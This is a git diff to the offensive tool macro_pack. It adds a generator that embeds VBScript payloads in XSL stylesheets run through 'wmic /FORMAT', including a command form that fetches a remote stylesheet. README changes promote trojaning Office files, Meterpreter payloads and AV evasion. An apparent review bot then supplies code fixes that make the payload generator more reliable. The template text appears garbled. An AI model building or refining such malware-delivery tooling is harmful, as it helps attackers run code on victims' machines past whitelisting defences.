diff --git a/README.md b/README.md index e6cd780..b43374e 100644 --- a/README.md +++ b/README.md @@ -42,7 +42,7 @@ Note that the main goal of macro\_pack obfuscation is not to prevent reverse eng Macro Pack can generate several kind of MS office documents and scripts formats. The format will be automatically guessed depending on the given file extension. File generation is done using the option --generate or -G. -Macro Pack pro version also allow to trojan existing files with option --trojan or -T +Macro Pack pro version also allow to trojan existing Office files with option --trojan or -T Ms Office Supported formats are: * MS Word 97 (.doc) @@ -60,6 +60,7 @@ Scripting (txt) supported formats are: * Windows Script File (.wsf) * Windows Script Components scriptlets (.wsc, .sct) * HTML Applications (.hta) +* XSLT Stylesheet (.xsl) (Yes MS XSLT contains scripts ^^) Shortcuts supported formats are: * Shell Link (.lnk) @@ -89,7 +90,7 @@ The pro mode includes features such as: * Lateral movement using DCOM objects * Anti-debug using http://seclists.org/fulldisclosure/2017/Mar/90 -For now I do not plan to release or sell this pro version however if you are really interested I can share pro binary in the next case: +For now I do not plan to release or sell this pro version however if you are really interested I can share code in the next case: * You significantly contribute to macro\_pack on GitHub + I need to know your identity 
@@ -310,7 +311,7 @@ echo 192.168.0.5 4444 | macro_pack.exe -t METERPRETER -o -G "\\192.168.0.8\c$\us -G, --generate=OUTPUT_FILE_PATH. Generates a file. Will guess the format based on extension. Supported Ms Office extensions are: doc, docm, docx, xls, xlsm, xslx, pptm, vsd, vsdm, mpp. Note: Ms Office file generation requires Windows OS with right MS Office application installed. - Supported Visual Basic scripts extensions are: vba, vbs, wsf, wsc, sct, hta. + Supported Visual Basic scripts extensions are: vba, vbs, wsf, wsc, sct, hta, xsl. Supported shortcuts extensions are: scf, url, glk -e, --embed=EMBEDDED_FILE_PATH Will embed the given file in the body of the generated document. @@ -482,7 +483,8 @@ If you have an issue with macro\_pack AV detection you can write to us for advic ## Relevant resources -Blog posts about MS Office & retro stuff security: +Blog posts about hacking with MS Office, VBS, and other retro stuff security: + - https://subt0x11.blogspot.fr/2018/04/wmicexe-whitelisting-bypass-hacking.html - http://blog.sevagas.com/?My-VBA-Bot (write a full VBA RAT, includes how to bypass VBOM protection) - http://blog.sevagas.com/?Hacking-around-HTA-files (run hta code in non-hta files and hta polyglots) - http://pwndizzle.blogspot.fr/2017/03/office-document-macros-ole-actions-dde.html @@ -500,7 +502,7 @@ Blog posts about MS Office & retro stuff security: - https://www.metasploit.com/ - https://github.com/Cn33liz/MacroMeter - https://github.com/khr0x40sh/MacroShop - + - https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script ## Contact diff --git a/assets/xsl_webmeter.png b/assets/xsl_webmeter.png new file mode 100644 index 0000000..183d7ad Binary files /dev/null and b/assets/xsl_webmeter.png differ diff --git a/src/common/help.py b/src/common/help.py index 6983c39..72dd55a 100644 --- a/src/common/help.py +++ b/src/common/help.py 
@@ -177,7 +177,7 @@ def printUsage(banner, currentApp, mpSession): -G, --generate=OUTPUT_FILE_PATH. Generates a file. Will guess the format based on extension. Supported Ms Office extensions are: doc, docm, docx, xls, xlsm, xslx, pptm, vsd, vsdm, mpp. Note: Ms Office file generation requires Windows OS with right MS Office application installed. - Supported Visual Basic scripts extensions are: vba, vbs, wsf, wsc, sct, hta. + Supported Visual Basic scripts extensions are: vba, vbs, wsf, wsc, sct, hta, xsl. Supported shortcuts extensions are: lnk, scf, url, glk -e, --embed=EMBEDDED_FILE_PATH Will embed the given file in the body of the generated document. diff --git a/src/common/utils.py b/src/common/utils.py index 8324136..3bd4767 100644 --- a/src/common/utils.py +++ b/src/common/utils.py @@ -59,17 +59,18 @@ class MSTypes(): LNK="Shell Link" GLK = "Groove Shortcut" SCF="Explorer Command File" + XSL="XSLT Stylesheet" URL="URL Shortcut" UNKNOWN = "Unknown" MS_OFFICE_FORMATS = [ XL, XL97, WD, WD97, PPT, MPP, VSD, VSD97] # Formats supported by macro_pack - VB_FORMATS = [VBA, VBS, HTA, SCT, WSF ] + VB_FORMATS = [VBA, VBS, HTA, SCT, WSF, XSL ] VB_FORMATS.extend(MS_OFFICE_FORMATS) Shortcut_FORMATS = [LNK, GLK, SCF, URL] EXTENSION_DICT = { LNK:".lnk", GLK:".glk", SCF:".scf", URL:".url", XL:".xlsm", XL97:".xls", WD:".docm", WD97:".doc", PPT:".pptm", PPT97:".ppt", MPP:".mpp", PUB:".pub", VSD:".vsdm", VSD97:".vsd", - VBA:".vba", VBS:".vbs", HTA:".hta", SCT:".wsc", WSF:".wsf" } + VBA:".vba", VBS:".vbs", HTA:".hta", SCT:".wsc", WSF:".wsf", XSL:".xsl" } @classmethod def guessApplicationType(self, documentPath): @@ -114,6 +115,8 @@ def guessApplicationType(self, documentPath): result = self.LNK elif ".scf" == extension.lower(): result = self.SCF + elif ".xsl" == extension.lower(): + result = self.XSL else: result = self.UNKNOWN return result diff --git a/src/macro_pack.py b/src/macro_pack.py index 9a559cd..8319ca6 100755 --- a/src/macro_pack.py +++ b/src/macro_pack.py 
@@ -22,6 +22,7 @@ from modules.com_run import ComGenerator from modules.listen_server import ListenServer from modules.scf_gen import SCFGenerator +from modules.xsl_gen import XSLGenerator from modules.url_gen import UrlShortcutGenerator from modules.glk_gen import GlkGenerator from modules.lnk_gen import LNKGenerator @@ -366,6 +367,10 @@ def main(argv): if mpSession.outputFileType == MSTypes.SCF: generator = SCFGenerator(mpSession) generator.run() + + if mpSession.outputFileType == MSTypes.XSL: + generator = XSLGenerator(mpSession) + generator.run() if mpSession.outputFileType == MSTypes.URL: generator = UrlShortcutGenerator(mpSession) diff --git a/src/modules/xsl_gen.py b/src/modules/xsl_gen.py new file mode 100644 index 0000000..de5c1c0 --- /dev/null +++ b/src/modules/xsl_gen.py @@ -0,0 +1,56 @@ +#!/usr/bin/env python +# encoding: utf-8 + +import logging +from modules.vbs_gen import VBSGenerator + +XSL_TEMPLATE = \ +r""" + + +>> +<<
>> + + +]]> + + +""" + + + +class XSLGenerator(VBSGenerator): + """ Module used to generate XSL file from working dir content + To execute: + wmic os get /FORMAT:test.xsl + Also work on remote files + wmic os get /FORMAT:http://www.domain.blah/hello.xsl + """ + + + def generate(self): + logging.info(" [+] Generating %s file..." % self.outputFileType) + self.vbScriptConvert() + f = open(self.getMainVBAFile()+".vbs") + vbsContent = f.read() + f.close() + + XSL_ECHO= r"""CreateObject("WScript.Shell").Run("cmd /c echo XSLT does not handle output message! & PAUSE") '""" + vbsContent = vbsContent.replace("WScript.Echo ", XSL_ECHO) + + # Write VBS in template + xslContent = XSL_TEMPLATE + xslContent = xslContent.replace("<<>>", vbsContent) + xslContent = xslContent.replace("<<
>>", self.startFunction)
+ # Write in new HTA file
+ f = open(self.outputFilePath, 'w')
+ f.writelines(xslContent)
+ f.close()
+ logging.info(" [-] Generated %s file: %s" % (self.outputFileType, self.outputFilePath))
+ logging.info(" [-] Test with : \nwmic os get /FORMAT:\"%s\"\n" % self.outputFilePath)
+
+
+
+
+
\ No newline at end of file
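Review bot: The converted VBS is spliced into a CDATA section (the `]]>` line of XSL_TEMPLATE), so a payload that itself contains `]]>` closes the section early and produces a malformed stylesheet that wmic will reject or parse differently; escape it before substitution with `vbsContent = vbsContent.replace("]]>", "]]]]><![CDATA[>")`. The `WScript.Echo ` rewrite in `generate` is also case-sensitive while VBScript is not, so a `wscript.echo` in the source survives untouched and, presumably because the MSXML script host exposes no WScript object (the reason the rewrite exists), fails at run time — `re.sub(r"WScript\.Echo ", XSL_ECHO, vbsContent, flags=re.IGNORECASE)` with `re` imported at the top would cover it, and the trailing `'` in XSL_ECHO comments out the rest of the line, which would also swallow an `Else` branch on a one-line `If`. Both files are opened without `with`, so an exception between open and close leaks the handle, and `f.writelines(xslContent)` on a str writes one character at a time where `f.write` is meant; the `# Write in new HTA file` comment is carried over from the HTA generator and should say XSL. The placeholder tokens (`<<>>`) look garbled in this rendering, so the substitution itself is not checked here.
```python
    def generate(self):
        logging.info(" [+] Generating %s file..." % self.outputFileType)
        self.vbScriptConvert()
        with open(self.getMainVBAFile() + ".vbs") as f:
            vbsContent = f.read()

        # Route Echo through a shell: the XSLT script host is assumed to have no WScript object.
        XSL_ECHO = r"""CreateObject("WScript.Shell").Run("cmd /c echo XSLT does not handle output message! & PAUSE") '"""
        vbsContent = vbsContent.replace("WScript.Echo ", XSL_ECHO)
        # The script lands inside a CDATA section; a literal "]]>" in the payload would
        # terminate it early and corrupt the stylesheet, so split the terminator.
        vbsContent = vbsContent.replace("]]>", "]]]]><![CDATA[>")

        # … unchanged: placeholder substitution into XSL_TEMPLATE …
        # Write the XSL stylesheet
        with open(self.outputFilePath, 'w') as f:
            f.write(xslContent)
        # … unchanged: logging of output path and wmic test command …
```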